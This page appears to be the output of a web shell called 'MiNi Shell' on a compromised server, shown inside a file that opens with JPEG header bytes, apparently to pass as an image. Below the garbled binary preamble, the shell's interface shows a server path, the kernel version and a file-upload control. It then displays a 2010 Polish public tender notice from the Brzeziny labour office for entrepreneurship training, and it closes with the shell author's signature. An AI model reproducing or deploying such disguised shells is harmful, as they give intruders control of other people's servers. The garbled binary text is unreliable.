JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100223/38007-N-2010.html

<p class="kh_header"><b>Brzeziny: Usługa szkoleniowa w zakresie ABC PRZEDSIĘBIORCZOŚCI.</b><br>
<b>Numer ogłoszenia: 38007 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sienkiewicza 11, 95-060 Brzeziny, woj. łódzkie, tel. 046 874-25-23, faks 046 874-11-80.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa w zakresie ABC PRZEDSIĘBIORCZOŚCI..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie ABC PRZEDSIĘBIORCZOŚCI  według kodu określonego we Wspólnym Słowniku Zamówień 80500000-9 Usługi szkoleniowedla 30 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Brzezinach, uczestniczących w projekcie Postaw na sukces współfinansowanym ze środków Unii Europejskiej
 w ramach Europejskiego Funduszu Społecznego. Działanie 6.2 POKL. 

1.Zakres tematyczny szkolenia:
-rejestrowanie działalności gospodarczej wraz z prawnymi uwarunkowaniami prowadzenia działalności, procedury i opłaty,
-zasady opracowywania biznes planu (zajęcia praktyczne), -ewidencja działalności gospodarczej,
-rachunkowość w firmie (zajęcia teoretyczne i praktyczne), 
-prawne aspekty zatrudniania pracowników w firmie (zajęcia teoretyczne i praktyczne), -techniki marketingowe i promocja własnej firmy (zajęcia teoretyczne i praktyczne),
-zobowiązania z tytułu podatków oraz formy opodatkowania (zajęcia teoretyczne i praktyczne), 
-rozliczenia z Zakładem Ubezpieczeń Społecznych i Urzędem Skarbowym oraz zasady dokonywania kontroli działalności przedsiębiorców, 
-zasady udzielania pomocy publicznej dla przedsiębiorców, 
-działalność gospodarcza w warunkach jednolitego rynku wspólnotowego, -finansowanie zewnętrzne,
-finansowanie zewnętrzne działalności gospodarczej przy wykorzystaniu funduszy strukturalnych, 
-programy zewnętrzne finansujące rozwój małego przedsiębiorstwa, nie pochodzące z funduszy pomocowych (zajęcia teoretyczne i praktyczne), -osoby niepełnosprawne a prowadzenie działalności gospodarczej. 
Celem szkolenia będzie przygotowanie uczestników projektu do opracowania, a następnie przedłożenia Zamawiającemu w trakcie postępowania kwalifikacyjnego:
-Wniosku o przyznanie wsparcia finansowego, 
-Biznesplanu własnego przedsięwzięcia i harmonogramu rzeczowo-finansowego,
-Wniosku o przyznanie finansowego wsparcia pomostowego. 
2.Wyposażenie każdego uczestnika szkolenia w materiały dydaktyczne, których strona tytułowa opatrzona będzie logo UE, Logotypy POKL oraz informację szkolenie realizowane w ramach projektu Postaw na sukces współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz notatnik i długopis.
 3.Uczestnicy mają zapewniony dostęp do stanowiska komputerowego w czasie zajęć praktycznych. 
4.Liczba osób objętych szkoleniem - 30 ( 2 grupy po 15 osób). 
5.Szkolenie dla obu grup będzie przebiegać w tych samych dniach. 
6.Czas trwania kursu: do 3 tygodni; ilość godzin na jednego uczestnika - 90 zegarowych, w tym 39 godzin zajęć teoretycznych i 51 godzin zajęć praktycznych. Program szkolenia musi być realizowany według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. 
Program szkolenia musi wykorzystywać standardy kwalifikacji zawodowych, modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez MPiPS znajdujących się na stronie internetowej www.standardyiszkolenia.praca.gov.pl. 
7.Zajęcia będą odbywały się codziennie w dni robocze (od poniedziałku do piątku). 
8.W przypadku rezygnacji uczestnika projektu z udziału w szkoleniu wykonawca zobowiązany będzie przeprowadzić w celu realizacji wszystkich godzin szkolenia zgodnie z programem- zajęcia indywidualne (uzupełniające) z nowym uczestnikiem projektu. 
9. Jednostka szkoleniowa zapewni uczestnikom szkolenia ubezpieczenie NNW w przypadku osób nie posiadających prawa do stypendium. 
10. Szkolenie zakończy się egzaminem. 
11. Firma wystawi odpowiednie zaświadczenie każdemu uczestnikowi szkolenia, który pozytywnie zaliczy egzamin końcowy. 
12. Liczba osób objętych szkoleniem może ulec zwiększeniu w przypadku uwzględnienia odwołań.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Spełniają warunki określone przepisami art. 22 ust.1 pkt. 1-4, dotyczące: 
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
2)posiadania wiedzy i doświadczenia, 
3)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, 
4)sytuacji ekonomicznej i finansowej. 

2.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie  art. 24 ust. l i 2 ustawy;

3.Posiadają zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę instytucji szkoleniowej oraz oświadczenie, iż na dzień składania oferty instytucja figuruje w RIS oraz posiadają uprawnienia do wydawania zaświadczeń na druku zgodnym z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216.).
Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków sporządzony będzie zgodnie z drukiem Zp-17 - wzór z Rozporządzenia Prezesa Rady Ministrów, z dnia 16.10.2008 r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego /Dz.U. z 2008 r. Nr 188, poz.1154/, w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie 2 usługi szkoleniowe dla minimum 10 osób, a każda z tych usług zawierała następujące bloki tematyczne: regulacje prawne obowiązujące w małej firmie, sporządzanie biznesplanu, rodzaje i formy opodatkowania działalności gospodarczej, marketing i zarządzanie małą firmą,
 2)do prowadzenia zajęć dydaktycznych zaangażują kadrę posiadającą odpowiednie kwalifikacje, przygotowanie pedagogiczne oraz minimum dwuletni staż zawodowy na przestrzeni ostatnich 3 lat, w prowadzeniu zajęć w zakresie tematycznym określonym powyżej. 
3)zapewnią nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia.
Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków sporządzony będzie zgodnie z drukiem Zp-17 - wzór z Rozporządzenia Prezesa Rady Ministrów, z dnia 16.10.2008 r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego /Dz.U. z 2008 r. Nr 188, poz.1154/, w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)wykonają usługę szkoleniową w dostosowanych ilościowo i jakościowo pomieszczeniach, 
z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki (sale/a do prowadzenia zajęć teoretyczno-praktycznych dla 15 osób), 
2)przeprowadzą zajęcia dydaktyczne w pracowniach wyposażonych w odpowiedni sprzęt niezbędny do przeprowadzenia zajęć teoretycznych i praktycznych (wymaga się, żeby każda sala wyposażona była w projektor lub rzutnik*) oraz posiadają niezbędny sprzęt do przeprowadzenia zajęć praktycznych (komputery lub laptopy - minimum 6 sztuk). 
*W przypadku, kiedy wykonawca będzie dysponował 1 salą-każda grupa musi mieć zajęcia w tym samym dniu, ale w innych godzinach.
Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków sporządzony będzie zgodnie z drukiem Zp-17 - wzór z Rozporządzenia Prezesa Rady Ministrów, z dnia 16.10.2008 r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego /Dz.U. z 2008 r. Nr 188, poz.1154/, w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych, w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę instytucji szkoleniowej oraz oświadczenie, iż na dzień składania oferty instytucja figuruje w RIS.
3.Wykaz kadry dydaktycznej wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami. 
4.Oświadczenie potwierdzające posiadanie przez kadrę dydaktyczną co najmniej dwuletniego stażu zawodowego, na przestrzeni ostatnich trzech lat w prowadzeniu zajęć teoretycznych i praktycznych zawartych w zakresie tematycznym związanym z regulacjami prawnymi obowiązującymi w małej firmie, sporządzaniem biznesplanu, rodzajami i formami opodatkowania działalności gospodarczej, marketingiem i zarządzaniem małą firmą. 
5.Wzór zaświadczenia na druku zgodnym z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216.) wraz z oświadczeniem o możliwości wydawania takich zaświadczeń. 
6. Informacja o miejscu prowadzenia zajęć teoretycznych i praktycznych wraz z opisem warunków technicznych miejsca prowadzenia zajęć tj. warunków lokalowych warunków BHP i innych oraz wykaz sprzętu do prowadzania zajęć teoretycznych i praktycznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Kwalifikacje kadry dydaktycznej - 25</li>
<li>3 - Warunki lokalowe i sprzęt - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega zgodnie z art. 144 ustawy, iż w przypadku: - zwiększenia liczby uczestników szkolenia zapłaci cenę za faktycznie skierowane osoby na szkolenie (tj. mnożąc koszt osobogodziny szkolenia przez liczbę godzin szkolenia oraz przez koszt uczestników szkolenia). W związku, z tym wynagrodzenie Wykonawcy może ulec zwiększeniu. 
Zamawiający dopuszcza możliwość zmiany umowy zgodnie z art. 144 ustawy w przypadku zaistnienia okoliczności, których nie można przewidzieć w chwili podpisania umowy lub jeżeli zmiany są korzystne dla zamawiającego (zmiana kadry dydaktycznej, jest dopuszczalna tylko w uzasadnionych przypadkach losowych, o ile zmiana nastąpi na kadrę spełniającą kryteria określone w wykazie kadry dydaktycznej).
 Zgodnie z art. 144 ustawy, Zamawiający zastrzega sobie prawo do zmiany daty realizacji szkolenia, zmiany miejsca świadczenia usługi. 
Zamawiający zastrzega zgodnie z art.145 ustawy, iż w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy 
w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku o którym mowa powyżej Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-brzeziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia uzyskać można w siedzibie Powiatowego Urzędu Pracy 
w Brzezinach, ul. Sienkiewicza 11, w godz. 8.00 - 15.30, parter, pokój 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2010 godzina 14:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, pok. nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Postaw na sukces współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego. Działanie 6.2 POKL...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com